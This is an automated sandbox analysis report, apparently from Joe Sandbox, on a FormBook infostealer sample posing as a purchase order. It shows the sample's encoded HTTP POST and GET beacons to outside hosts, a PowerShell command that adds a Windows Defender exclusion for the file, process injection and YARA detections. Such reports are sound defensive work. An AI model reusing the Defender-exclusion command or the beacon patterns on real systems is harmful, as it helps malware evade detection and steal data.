                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          28 | 192.168.2.5 | 53681 | 104.194.9.31 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:04.549344063 CEST | 490 | OUT | GET /a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.digitoxmarketing.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:05.396291971 CEST | 654 | IN | HTTP/1.1 301 Moved Permanently
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=196441b8a2c2c8859576ceba02afe239d02065f706b2b9ac955c469db24b2597; expires=Tue, 19-Nov-2024 13:19:05 GMT; Max-Age=15552000; path=/
                          x-redirect-by: WordPress
                          location: http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww==
                          content-length: 0
                          date: Thu, 23 May 2024 13:19:05 GMT
                          server: LiteSpeed


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          29 | 192.168.2.5 | 53682 | 192.74.233.3 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:20.073625088 CEST | 741 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=qJKnbOti7Ri34RFD4mBeA0vMBNoNlaiJFVxiyYDkmxB3ZEuK3ZlafRqxeE6nEvZVv9k01T8bCrWT9BewlYbxEgu5/WnXzkkBK1pGBY1iDmZ+h61vuhCi7ZLrCVEGXg1grv9szYsECm44cOobwZ0NUTfCzojKE9Oyml/EPF57togn+Dh+GuXtDkwMyg3PBshx2KLfLe8=


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          30 | 192.168.2.5 | 53683 | 192.74.233.3 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:22.606189966 CEST | 761 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=qJKnbOti7Ri3515D+15eGUvPLtoNu6iFFVtiyav0mkR3ZkeK2YlaaRqxRk7jafYZv95H1WUbCrCT9BuwirjyLQu732nZ3kkBK1pGBYgqDmh+iJ9vuDqh35LkUFEGTg1srv8DzaIuCkw4cLMbwI0MDDfMuYiDCsO8o3rNGEc8xugj2VMUcMfFQEc0iz/4QcAYspbvVJqR385+xWgaTu+qxsyCWdB/


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          31 | 192.168.2.5 | 53684 | 192.74.233.3 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:25.138051987 CEST | 1778 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          32 | 192.168.2.5 | 53685 | 192.74.233.3 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:27.667363882 CEST | 481 | OUT | GET /a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.6whebx.cyou
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          33 | 192.168.2.5 | 53686 | 66.29.137.43 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:33.342453957 CEST | 759 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=w+1wjqkz6vBDaC0DRwurl27KN/EbpOcVz12gHpIGWf9YzhKejhSBmb554KQ9pMxStHGvwOqGFgiUKVlKaB9EYwKwbSQJBGuUL2W2u8XEA6TOEAvw7SPwuQhRRERMz5yul33GoY44rDl3SF8zTw/PjXwYo4s+V81W6ZsOirQ25vb/5Ffa8k4G+MG6YC1d7VYb/eB3CK0=
                          May 23, 2024 15:19:33.932486057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:33 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:33.939410925 CEST | 316 | IN |
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          34 | 192.168.2.5 | 53687 | 66.29.137.43 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:35.869069099 CEST | 779 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=w+1wjqkz6vBDAjEDTRurjW7NGfEbwed9z16gHocWWrRYzBaeigSBlb55zqQ4tMxZtH7MwLCGFg2UKUVKbw9DYgKyACQXPmuUL2W2u8yhA6LOEQ/w7zPvwAhSZkRM35yql334oZldrGh3SHkzSlfM4HwS3ostetURgI0Zoqw148fe8zywmGwutsqCIR9qql5yl9RHcdjLIXMUwBA81xEVywYCLt0Q
                          May 23, 2024 15:19:36.461682081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:36 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:36.466526985 CEST | 316 | IN |
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          35 | 192.168.2.5 | 53688 | 66.29.137.43 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:38.400913954 CEST | 1796 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:39.005091906 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:38 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:39.009840012 CEST | 316 | IN |
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          36 | 192.168.2.5 | 53689 | 66.29.137.43 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:41.197451115 CEST | 487 | OUT | GET /a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.ratulunabet78.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:41.800538063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:41 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:41.805368900 CEST | 316 | IN |
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Target ID: 0
                          Start time: 09:15:50
                          Start date: 23/05/2024
                          Path: C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase: 0xdc0000
                          File size: 715'264 bytes
                          MD5 hash: 1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: low
                          Has exited: true

                          Target ID: 3
                          Start time: 09:15:51
                          Start date: 23/05/2024
                          Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase: 0x7c0000
                          File size: 433'152 bytes
                          MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 4
                          Start time: 09:15:51
                          Start date: 23/05/2024
                          Path: C:\Windows\System32\conhost.exe
                          Wow64 process (32bit): false
                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase: 0x7ff6d64d0000
                          File size: 862'208 bytes
                          MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 5
                          Start time: 09:15:51
                          Start date: 23/05/2024
                          Path: C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit): false
                          Commandline: "C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase: 0x120000
                          File size: 715'264 bytes
                          MD5 hash: 1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: low
                          Has exited: true

                          Target ID:6
                          Start time:09:15:52
                          Start date:23/05/2024
                          Path:C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase:0xb40000
                          File size:715'264 bytes
                          MD5 hash:1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:09:15:58
                          Start date:23/05/2024
                          Path:C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe"
                          Imagebase:0xae0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:8
                          Start time:09:15:59
                          Start date:23/05/2024
                          Path:C:\Windows\SysWOW64\openfiles.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                          Imagebase:0x190000
                          File size:60'416 bytes
                          MD5 hash:50BD10A4C573E609A401114488299D3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:10
                          Start time:09:16:14
                          Start date:23/05/2024
                          Path:C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe"
                          Imagebase:0xae0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:13
                          Start time:09:16:51
                          Start date:23/05/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff79f9e0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true


                            Execution Graph

                            Execution Coverage:9.9%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:1%
                            Total number of Nodes:206
                            Total number of Limit Nodes:14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 016BD4BE
                            • GetCurrentThread.KERNEL32 ref: 016BD4FB
                            • GetCurrentProcess.KERNEL32 ref: 016BD538
                            • GetCurrentThreadId.KERNEL32 ref: 016BD591
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 016BD4BE
                            • GetCurrentThread.KERNEL32 ref: 016BD4FB
                            • GetCurrentProcess.KERNEL32 ref: 016BD538
                            • GetCurrentThreadId.KERNEL32 ref: 016BD591
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076E9126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076E9126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0

                            Control-flow Graph

                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB3FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0

                            Control-flow Graph

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 016B5D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
